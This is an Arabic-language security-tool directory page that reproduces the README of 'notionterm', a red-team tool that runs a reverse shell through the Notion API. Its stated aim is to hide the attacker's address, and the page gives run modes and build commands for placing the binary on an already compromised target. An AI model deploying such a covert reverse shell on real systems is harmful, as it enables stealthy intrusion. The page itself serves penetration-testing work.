Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/ariary/notionterm
توليد الحمولةالاستغلالالهندسة العكسيةأمن الويبالقيادة والسيطرةالفريق الأحمر
GitHubariary/notionterm

notionterm

قم بتضمين صدفة عكسية في صفحات Notion باستخدام واجهة برمجة تطبيقات Notion كوكيل، مما يتيح جلسات صدفة عن بعد خفية مع اتصال مشفر وموثَّق لعمليات الفريق الأحمر.

عرض المستودع
13715منذ 3 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

notionterm

تضمين شل عكسية في صفحات Notion.
اخترق أثناء تدوين الملاحظات


عرض توضيحي


للاستخدام ➕:

  • إخفاء عنوان IP للمهاجم في الشل العكسية (لا يوجد تفاعل مباشر بين المهاجم والجهاز المستهدف. يتم استخدام Notion كوسيط يستضيف الشل العكسية)
  • إدراج عرض توضيحي/إثبات سريع ضمن التقرير
  • شل عكسية عالية التوفر وقابلة للمشاركة (سطح المكتب، المتصفح، الجوال)
  • شل عن بعد مشفرة وموثقة

غير مناسب لـ ➖:

  • جلسات شل طويلة وتفاعلية (انظر tacos لذلك)

لماذا؟ 🤔

كان التركيز على صنع شيء ممتع مع بقائه قابلًا للاستخدام، ولكن ليس المقصود أن يكون الحل الأمثل للشل العكسية في ترسانة المختبِر.

كيف؟ 🤷‍♂️

فقط استخدم Notion كالمعتاد وقم بتشغيل notionterm على الهدف.

المتطلبات 🖊️

  • برنامج Notion ومفتاح API
  • السماح باتصالات HTTP من الهدف إلى نطاق Notion
  • وجود RCE مسبق على الهدف

مستوحى تقريبًا من الفكرة الرائعة لـ OffensiveNotion و notionion!

باختصار

تعلم الأوامر والخيارات ممل للغاية: استخدم wrap-notionterm.sh

بداية سريعة

🏗️ الإعداد

  1. أنشئ صفحة وامنح مفتاح API للتكامل صلاحيات الوصول للكتابة في الصفحة
  2. قم ببناء notionterm وانقله إلى الجهاز المستهدف (انظر البناء)

👟 التشغيل

هناك 3 طرق رئيسية لتشغيل notionterm:

الوضع العادي
احصل على طرفية، أوقفها/استأنفها، إلخ...
notionterm [flags]
ابدأ الشل باستخدام واجهة الزر: شغّل ON، قم بأعمال الشل العكسية، أوقف OFF للإيقاف المؤقت، شغّل ON للاستئناف، إلخ...
وضع الخادم
تسهيل تضمين notionterm في أي صفحة
notionterm --server [flags]
ابدأ جلسة شل في أي صفحة عن طريق إنشاء كتلة تضمين بعنوان URL يحتوي على معرف الصفحة (اضغط CTRL+L للحصول عليه): https://[TARGET_URL]/notionterm?url=[NOTION_PAGE_ID].
الوضع الخفيف
ينفذ حركة HTTP فقط من الهدف ← Notion
notionterm light [flags]

بناء

بما أن notionterm مصمم للتشغيل على الجهاز المستهدف، يجب بناؤه ليتوافق معه.

لذا قم بتعيين متغيرات البيئة لتتناسب مع متطلبات الهدف:

root@kitploit:~
GOOS=[windows/linux/darwin]

بناء بسيط

root@kitploit:~
git clone https://github.com/ariary/notionterm.git && cd notionterm
GOOS=$GOOS go build notionterm.go

ستحتاج إلى تعيين مفتاح API وعنوان URL لصفحة Notion باستخدام إما متغيرات البيئة (NOTION_TOKEN & NOTION_PAGE_URL) أو الخيارات (--token & --page-url)

بناء شامل

قم بتضمين رمز API لتكامل Notion وعنوان URL لصفحة Notion مباشرة في الملف الثنائي. ⚠️ يمكن لأي شخص لديه حق الوصول إلى الملف الثنائي استرداد الرمز. لأسباب أمنية لا تشاركه وقم بإزالته بعد الاستخدام.

قم بتعيين متغيرات البيئة وفقًا لذلك:

root@kitploit:~
export NOTION_PAGE_URL=[NOTION_PAGE_URL]
export NOTION_TOKEN=[INTEGRATION_NOTION_TOKEN]

وقم ببنائه:

root@kitploit:~
git clone https://github.com/ariary/notionterm.git && cd notionterm
./static-build.sh $NOTION_PAGE_URL $NOTION_TOKEN $GOOS
تنزيل الأداة